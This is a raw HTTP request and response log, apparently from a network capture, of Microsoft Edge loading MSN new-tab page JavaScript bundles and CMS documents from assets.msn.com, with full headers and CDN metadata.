ResponseHTTP/2.0 200
last-modified: Thu, 22 Dec 2022 23:04:57 GMT
etag: W/"842"
server: Microsoft-HTTPAPI/2.0
x-cms-documentstoragetier: Cache
x-cms-documentid: BBGgoUg
x-cms-version: 337
x-cms-state: Published
x-cms-tenant: amp
x-cms-type: list
x-cms-executiontimeinmilliseconds: 8
access-control-allow-origin: https://ntp.msn.com
access-control-expose-headers: X-Trace-Context,X-CMS-DocumentId,X-CMS-Type,X-CMS-Tenant,X-CMS-State,X-CMS-Version,ETag,X-CMS-SearchElapsedTimeInMilliseconds,X-CMS-SearchBackendTimeInMilliseconds,X-CMS-SearchMatchedTotal,X-CMS-SearchMaxScore,X-CMS-SearchShardsTotal,X-CMS-SearchShardsSuccessful,X-CMS-SearchShardsFailed,X-CMS-SearchReturnedCount,X-CMS-ExecutionTimeInMilliseconds,MS-CV
appex-activity-id: e25d0960-cf52-41ab-b7cc-9eb2f0f83f48
x-trace-context: {"ActivityId":"e25d0960-cf52-41ab-b7cc-9eb2f0f83f48"}
ms-cv: 3rVTRyI9wUelqzzc0JwVfw.0
x-cms-servicelocation: eastus:0
content-encoding: gzip
cache-control: max-age=900
date: Sat, 31 Dec 2022 00:06:03 GMT
content-length: 2238
akamai-request-bc: [a=88.221.24.111,b=431552911,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=39, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8f98f
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/articleFre.e3bf405503e652d34746.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/articleFre.e3bf405503e652d34746.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: rmNxvy+RTpb7w9Zx4qOSsg==
last-modified: Tue, 20 Dec 2022 05:42:22 GMT
etag: 0x8DAE24CF76D3E20
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9d6ab214-101e-00d9-6f5a-144aed000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:05 GMT
akamai-request-bc: [a=88.221.24.111,b=431554800,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=41, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b900f0
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /content/v1/cms/api/amp/Document/BBOTMVt HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-encoding: gzip
last-modified: Thu, 25 Oct 2018 19:18:55 GMT
etag: W/"14"
x-cms-documentstoragetier: Cache
x-cms-documentid: BBOTMVt
x-cms-version: 4
x-cms-state: Published
x-cms-tenant: amp
x-cms-type: provider
x-cms-executiontimeinmilliseconds: 0
access-control-allow-origin: https://ntp.msn.com
access-control-expose-headers: X-Trace-Context,X-CMS-DocumentId,X-CMS-Type,X-CMS-Tenant,X-CMS-State,X-CMS-Version,ETag,X-CMS-SearchElapsedTimeInMilliseconds,X-CMS-SearchBackendTimeInMilliseconds,X-CMS-SearchMatchedTotal,X-CMS-SearchMaxScore,X-CMS-SearchShardsTotal,X-CMS-SearchShardsSuccessful,X-CMS-SearchShardsFailed,X-CMS-SearchReturnedCount,X-CMS-ExecutionTimeInMilliseconds,MS-CV
appex-activity-id: d1be520d-b92c-4c9d-8a22-08769e97c898
x-trace-context: {"ActivityId":"d1be520d-b92c-4c9d-8a22-08769e97c898"}
ms-cv: j2/bzRCnJ0ScQQAP6Y3Kkg.0
x-cms-servicelocation: eastus:1
x-frame-options: deny
content-length: 601
cache-control: max-age=900
expires: Sat, 31 Dec 2022 00:21:05 GMT
date: Sat, 31 Dec 2022 00:06:05 GMT
akamai-request-bc: [a=88.221.24.111,b=431555105,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b90221
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/articleRelatedStories.2499321aeb09db944d31.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/articleRelatedStories.2499321aeb09db944d31.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: Q93nyZXkwLtasgqBjaxbrA==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF579A681
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: fed06f01-701e-005b-6764-144bbc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:05 GMT
akamai-request-bc: [a=88.221.24.111,b=431555258,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b902ba
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /content/v1/cms/api/amp/Document/BB1dwxz2 HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
last-modified: Tue, 26 Apr 2022 16:23:05 GMT
etag: W/"6"
server: Microsoft-HTTPAPI/2.0
x-cms-documentstoragetier: Cache
x-cms-documentid: BB1dwxz2
x-cms-version: 2
x-cms-state: Published
x-cms-tenant: amp
x-cms-type: provider
x-cms-executiontimeinmilliseconds: 2
access-control-allow-origin: https://ntp.msn.com
access-control-expose-headers: X-Trace-Context,X-CMS-DocumentId,X-CMS-Type,X-CMS-Tenant,X-CMS-State,X-CMS-Version,ETag,X-CMS-SearchElapsedTimeInMilliseconds,X-CMS-SearchBackendTimeInMilliseconds,X-CMS-SearchMatchedTotal,X-CMS-SearchMaxScore,X-CMS-SearchShardsTotal,X-CMS-SearchShardsSuccessful,X-CMS-SearchShardsFailed,X-CMS-SearchReturnedCount,X-CMS-ExecutionTimeInMilliseconds,MS-CV
appex-activity-id: 4ca5d8a3-6c57-4605-b0be-6cc4d41312ff
x-trace-context: {"ActivityId":"4ca5d8a3-6c57-4605-b0be-6cc4d41312ff"}
ms-cv: cyJPd8XhJ0CV9CxDiHLyAQ.0
x-cms-servicelocation: eastus:0
content-encoding: gzip
content-length: 733
cache-control: max-age=900
date: Sat, 31 Dec 2022 00:06:05 GMT
akamai-request-bc: [a=88.221.24.111,b=431555808,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b904e0
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_weather-card-wc_dist_components_weather-hide-dialog_index_js.a9e732aa68c48635c6b0.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/experiences_weather-card-wc_dist_components_weather-hide-dialog_index_js.a9e732aa68c48635c6b0.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: Vjr6gSqViYh75i9Hti2Akg==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF4E1E993
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 744fc509-301e-004f-0b5a-145796000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:05 GMT
akamai-request-bc: [a=88.221.24.111,b=431555811,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b904e3
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/articleTopComment.261f195982c3f9f2e127.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/articleTopComment.261f195982c3f9f2e127.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 13X7xinUj6aLLC//T1H1JQ==
last-modified: Tue, 20 Dec 2022 23:56:05 GMT
etag: 0x8DAE2E5C212C783
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7fe1d633-801e-00f4-7546-1904c5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:05 GMT
akamai-request-bc: [a=88.221.24.111,b=431555958,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=25, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b90576
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/autos-carousel.20db49212ef4a484aa56.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/autos-carousel.20db49212ef4a484aa56.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: svdjKwfzMraJl6vMQ8OIaQ==
last-modified: Tue, 20 Dec 2022 05:42:23 GMT
etag: 0x8DAE24CF835C7F4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5b5c2871-d01e-00e9-6350-146bfc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:05 GMT
akamai-request-bc: [a=88.221.24.111,b=431556244,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=27, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b90694
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/autosMarketplaceCard.9e0f6ffb58fb7ea93841.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/autosMarketplaceCard.9e0f6ffb58fb7ea93841.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: +ZbogwPaUGolqR7z/pMdfg==
last-modified: Fri, 16 Dec 2022 21:57:09 GMT
etag: 0x8DADFB07B12E307
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 45867885-601e-00ae-720c-1469e3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:06 GMT
akamai-request-bc: [a=88.221.24.111,b=431556489,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=38, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b90789
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/back-to-top-button.a93dfb875b4ed8c59d67.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/back-to-top-button.a93dfb875b4ed8c59d67.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: ANNN/2ZtT1Ct+ip7cLjHhA==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF4EAE8ED
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0010649e-301e-008f-0f52-14d3d2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:06 GMT
akamai-request-bc: [a=88.221.24.111,b=431557021,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=38, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9099d
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/background-gallery.f3d05771e6458ddeb71b.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/background-gallery.f3d05771e6458ddeb71b.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: VaWpbxgg3nn0RIHvDhB/xA==
last-modified: Tue, 20 Dec 2022 05:42:21 GMT
etag: 0x8DAE24CF70F2656
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fcbb082-601e-0052-755c-1438af000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:06 GMT
akamai-request-bc: [a=88.221.24.111,b=431557284,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=47, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b90aa4
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/bingHealthCard.e2a5e9af18da5031e9ab.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/bingHealthCard.e2a5e9af18da5031e9ab.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: qP0O0YVkEEGdq6gBC2eLVA==
last-modified: Fri, 16 Dec 2022 21:57:06 GMT
etag: 0x8DADFB078E94F32
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 98bbd6f7-101e-008d-54ab-1385d6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:06 GMT
akamai-request-bc: [a=88.221.24.111,b=431557621,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=33, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b90bf5
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/brand-zone.4e4118ac89e3b1da2a8f.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/brand-zone.4e4118ac89e3b1da2a8f.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: /KVGquOvEhA7AL2Je5wPjQ==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF56B50BE
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fe3b6fe-a01e-00f6-575a-1452c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:12 GMT
akamai-request-bc: [a=88.221.24.111,b=431567871,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=24, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b933ff
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/coachmark-wc.4bc2414da4b6a606950b.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/coachmark-wc.4bc2414da4b6a606950b.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: FB9bNs/0Ebj8jJE5ArnWBQ==
last-modified: Tue, 20 Dec 2022 23:56:05 GMT
etag: 0x8DAE2E5C1F5F4F0
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2de57f27-301e-00e7-2ace-14c9e1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:12 GMT
akamai-request-bc: [a=88.221.24.111,b=431568064,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=33, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b934c0
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/conditionalBannerWC.429af708b05046bc75d2.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/conditionalBannerWC.429af708b05046bc75d2.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 0ufEZzFaHG/pZhzvGRu50Q==
last-modified: Tue, 20 Dec 2022 05:42:20 GMT
etag: 0x8DAE24CF6817A0B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3466ae43-b01e-006b-095d-146aad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:12 GMT
akamai-request-bc: [a=88.221.24.111,b=431568063,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=33, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b934bf
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/breakingNewsWC.54f5d43f325cb7327a1f.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/breakingNewsWC.54f5d43f325cb7327a1f.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: Iv7eqJPjnLvkLtyCvOuEmA==
last-modified: Fri, 16 Dec 2022 21:57:06 GMT
etag: 0x8DADFB07931BF45
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 45e6e5e8-501e-00e1-0576-1333ed000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:12 GMT
akamai-request-bc: [a=88.221.24.111,b=431568078,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=33, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b934ce
access-control-allow-credentials: true
